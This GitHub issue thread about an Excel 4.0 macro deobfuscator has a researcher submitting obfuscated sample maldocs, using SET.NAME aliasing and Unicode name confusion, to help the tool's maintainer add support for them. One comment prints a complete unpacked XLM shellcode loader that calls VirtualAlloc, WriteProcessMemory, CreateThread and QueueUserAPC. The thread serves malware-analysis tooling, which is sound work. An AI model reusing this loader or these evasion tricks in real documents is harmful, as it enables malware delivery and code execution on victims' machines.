
Named function invocations can break deobfuscation

Open michaelweber opened this issue 4 years ago • 9 comments

Macro sheets allow Excel to replicate the effect of a RUN() invocation by defining a name and then referencing it in a sheet by appending () to the name.

For example:

=SET.NAME("InvokeMe",B1)
=InvokeMe()

is identical to calling RUN(B1). You can chain these expressions together as well, for example:

=SET.NAME("IndirectFunction","=B1")
=SET.NAME("IndirectInvocation",EVALUATE("IndirectFunction"))
=IndirectInvocation()

will also replicate calling RUN(B1). It looks like the invocation of a name and treating it as a RUN() expression hasn't been added to the grammar for the tool yet. Here's a small PoC for both of these cases that will help if maldoc authors start abusing this.
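For anyone thinking about the emulation side, here is a minimal Python sketch of the idea, not the tool's actual code. `NameTable`, `set_name` and `resolve_call` are hypothetical names that do not come from XLMMacroDeobfuscator. The assumption is that a call to an identifier which is not a built-in function can be looked up in the defined names and treated like RUN() on whatever reference it ends up pointing at. The EVALUATE() step is only approximated by letting one name point at another.

```python
import re

# Matches simple A1-style references such as B1 or $B$1 (assumption: no sheet prefixes).
CELL_REF = re.compile(r"^\$?[A-Za-z]{1,3}\$?\d+$")


class NameTable:
    """Hypothetical store for names defined via SET.NAME."""

    def __init__(self):
        self._names = {}

    def set_name(self, name, value):
        # Excel names are case-insensitive, so key on a folded form.
        self._names[name.casefold()] = value

    def resolve_call(self, identifier, max_hops=16):
        """Return the cell an `identifier()` call would jump to, or None."""
        target = identifier
        for _ in range(max_hops):  # hop limit guards against cyclic definitions
            value = self._names.get(target.casefold())
            if value is None:
                return None
            target = str(value).lstrip("=")
            if CELL_REF.match(target):
                return target.replace("$", "").upper()
        return None


names = NameTable()
names.set_name("InvokeMe", "B1")
names.set_name("IndirectFunction", "=B1")
# Stand-in for SET.NAME("IndirectInvocation",EVALUATE("IndirectFunction"))
names.set_name("IndirectInvocation", "IndirectFunction")

direct = names.resolve_call("InvokeMe")
chained = names.resolve_call("IndirectInvocation")
print(direct, chained)
```

Both calls resolve to B1 in this sketch, which is the cell an emulator would then branch to as if it had seen RUN(B1).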

setname-obfuscation.xls.zip

michaelweber avatar May 26 '20 22:05 michaelweber

Interesting. I will add these functions. No need to update the grammar, I suppose.

SET.NAME is used to define a name...

SET.NAME is partially implemented

DissectMalware avatar May 27 '20 01:05 DissectMalware

Generated a new sample based on an upcoming Macrome release - it's a wrapped-up version of EXCELntDonut with some obfuscation thrown in. It makes light use of SET.NAME aliasing by defining statements like varName=123, which may or may not work. The "final" macro after unpacking through all the CHAR() statements looks like:

=GOTO($A$2)
=GOTO($A$3)
=GOTO($A$4)
=GOTO($A$5)
=GOTO($A$6)
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO($A$10),GOTO($A$21))
=Valloc(0,65536,4096,64)
šœƒ=$B$1
=SET.VALUE($D$1,0)
=WHILE(šœƒ<>"excel")
=SET.VALUE($D$2,LEN(šœƒ))
=WProcessMemory(-1,$A$10+($D$1*255),šœƒ,LEN(šœƒ),0)
=SET.VALUE($D$1,$D$1+1)
šœƒ=ABSREF("R[1]C",šœƒ)
=NEXT()
=CThread(0,0,$A$10,0,0,0)
=HALT()
1342439424
0
=WHILE($A$22=0)
=SET.VALUE($A$22,Valloc($A$21,65536,12288,64))
=SET.VALUE($A$21,$A$21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
šœƒ=$C$1
=SET.VALUE($D$1,0)
=WHILE(šœƒ<>"EXCEL")
=SET.VALUE($D$2,LEN(šœƒ))
=RTL($A$22+($D$1*10),šœƒ,LEN(šœƒ))
=SET.VALUE($D$1,$D$1+1)
šœƒ=ABSREF("R[1]C",šœƒ)
=NEXT()
=Queue($A$22,-2,0)
=Go()
=SET.VALUE($A$22,0)
=HALT()

As an added "treat", the cells that are built contain raw binary strings rather than wrapping them as CHAR(). It looks like XLMMacroDeobfuscator handles this fine (though it plays a bunch of console alerts as it prints things out, which tends to slow down printing), but this may slightly frustrate some of the binary dumping.
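If the alerts come from control bytes such as BEL (0x07) reaching the terminal, which is my assumption and not something I have confirmed in the tool, escaping non-printable characters before printing would avoid them. A minimal Python sketch, with `printable` as a hypothetical helper name:

```python
def printable(cell_text):
    """Escape non-printable characters so the terminal does not act on them."""
    out = []
    for ch in cell_text:
        if ch.isprintable():
            out.append(ch)
        else:
            # unicode_escape turns e.g. BEL into the four characters \x07
            out.append(ch.encode("unicode_escape").decode("ascii"))
    return "".join(out)


escaped = printable("A\x07B\x00")
print(escaped)
```

The raw bytes stay recoverable from the escaped form, so this should not get in the way of dumping the binary afterwards.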

excelntdonut-macrome.xls.zip

michaelweber avatar May 31 '20 01:05 michaelweber

Generated an alternate document which can also cause some issues by abusing user defined functions combined with variables set using SET.NAME.

By hiding a subroutine somewhere else in the sheet (it can be as simple as =RETURN(CHAR(var))), we can fake passing an argument to the subroutine and invoke it with a call like:

=IF(SET.NAME("var",73),InvokeChar(),)

Which is identical to =CHAR(73).

Right now this sort of approach will not be emulated, so once the GOTO() is reached, there's no content shown.
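To make the trick concrete, here is a small Python model of what an emulator would need to do. All names here (`set_name`, `invoke_char`, `xlm_if`) are hypothetical stand-ins, and it assumes SET.NAME evaluates to TRUE on success, which is what the IF() in the sample relies on.

```python
names = {}


def set_name(name, value):
    """Mimic SET.NAME: store the value and report success."""
    names[name.casefold()] = value
    return True


def invoke_char():
    """Stand-in for the hidden subroutine =RETURN(CHAR(var))."""
    # chr() agrees with CHAR() for ASCII codes; higher codes depend on the code page.
    return chr(names["var"])


def xlm_if(condition, when_true, when_false=None):
    # Branches are callables so only the selected one runs.
    if condition:
        return when_true()
    return when_false() if when_false is not None else False


# =IF(SET.NAME("var",73),InvokeChar(),)
result = xlm_if(set_name("var", 73), invoke_char)
print(result)
```

The point is that the "argument" travels through the name table as a side effect of evaluating the condition, so the condition has to be emulated before the subroutine is entered.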

charsub-method.xls.zip

michaelweber avatar Jun 02 '20 00:06 michaelweber

Here's a slightly more refined version of the character substitution approach. This time the variable names take advantage of some Unicode silliness in Excel. From the Excel UI, a cell looks like:

[image: Some example cells]

I can't actually copy and paste the content out of Excel directly, since there are null bytes in the formula and the copy is truncated at the first of them.

charsub-unicode-name-magic.zip

michaelweber avatar Jun 07 '20 14:06 michaelweber

The charsub-method.xls.zip approach (user defined functions combined with variables set using SET.NAME) is addressed in v0.1.5 (currently on the master branch).

DissectMalware avatar Jun 07 '20 18:06 DissectMalware

Uploading a sample which takes advantage of some more Unicode ridiculousness: Excel treats ḁ (U+1E01, bytes 1E 01) and A (U+0041) followed by ◌̥ (U+0325) (bytes 00 41 03 25) as the same character in names.

unicode_decomposition.xls.zip

michaelweber avatar Jun 12 '20 23:06 michaelweber

That makes sense, to be honest. The same goes for À (it can be represented as two code points, a base letter plus a combining accent, or as a single precomposed Unicode character).
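For reference, this equivalence can be reproduced with standard Unicode normalization plus case folding. The Python sketch below uses a hypothetical `name_key` helper. It only shows that NFC normalization and case folding make these pairs compare equal; it is not a claim about what Excel does internally.

```python
import unicodedata


def name_key(name):
    """Hypothetical comparison key: NFC-normalize, then case-fold."""
    return unicodedata.normalize("NFC", name).casefold()


precomposed = "\u1e01"   # ḁ as a single code point
decomposed = "A\u0325"   # A followed by COMBINING RING BELOW

# The byte sequences quoted above are the UTF-16BE encodings of the two forms.
print(precomposed.encode("utf-16-be").hex(" "))
print(decomposed.encode("utf-16-be").hex(" "))

same_ring = name_key(precomposed) == name_key(decomposed)
same_grave = name_key("\u00c0") == name_key("A\u0300")  # the À case
print(same_ring, same_grave)
```

Note that the case folding is needed here as well as the normalization, because the decomposed form in the sample uses an uppercase A while U+1E01 is lowercase.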

DissectMalware avatar Jun 13 '20 12:06 DissectMalware

Here's a refinement of that abuse that attackers could use to obscure which argument is being passed to a function during analysis. In the sample below, each cell uses an AND statement to execute two SET.NAME calls before invoking the user defined function. One SET.NAME call sets the value to be used; the other sets a decoy value under a name that differs only at the byte level (the difference is imperceptible to the eye). Whether the first or the second SET.NAME call sets the correct argument is randomized for each cell.

[image]

unicode_specification_abuse.xls.zip

michaelweber avatar Jun 18 '20 15:06 michaelweber

Yeah, the capitalization is pretty reasonable - the issue is the uneven handling of things like Unicode whitespace characters or Unicode characters that are simply ignored. Ex:

[image: unicode_name_confusion_adjusted_for_endianness]

The fact that the Lbl record string and the "real" arg string are considered a match, but the "decoy" arg string is not, makes me wonder how much of this behavior follows the Unicode specification versus a series of arbitrary edge-case rules.
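For analysts trying to tell such names apart, dumping the code points is usually enough to expose the difference. A rough Python sketch follows; `describe` and `first_difference` are hypothetical helper names, and the decoy string is made up for illustration (a zero width space inserted into "var"), not taken from the sample.

```python
import unicodedata


def describe(name):
    """List each code point with its Unicode name and general category."""
    return [
        (f"U+{ord(ch):04X}", unicodedata.name(ch, "<unnamed>"), unicodedata.category(ch))
        for ch in name
    ]


def first_difference(a, b):
    """Index of the first differing code point, or None if the strings are equal."""
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            return i
    return None if len(a) == len(b) else min(len(a), len(b))


real = "var"
decoy = "va\u200br"  # illustrative only: ZERO WIDTH SPACE before the final letter

index = first_difference(real, decoy)
print(index, describe(decoy)[index])
```

Which of these code points Excel ignores when matching names is exactly the open question above, so a tool would probably have to record the observed behavior per character instead of relying on the general category alone.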

michaelweber avatar Jun 20 '20 16:06 michaelweber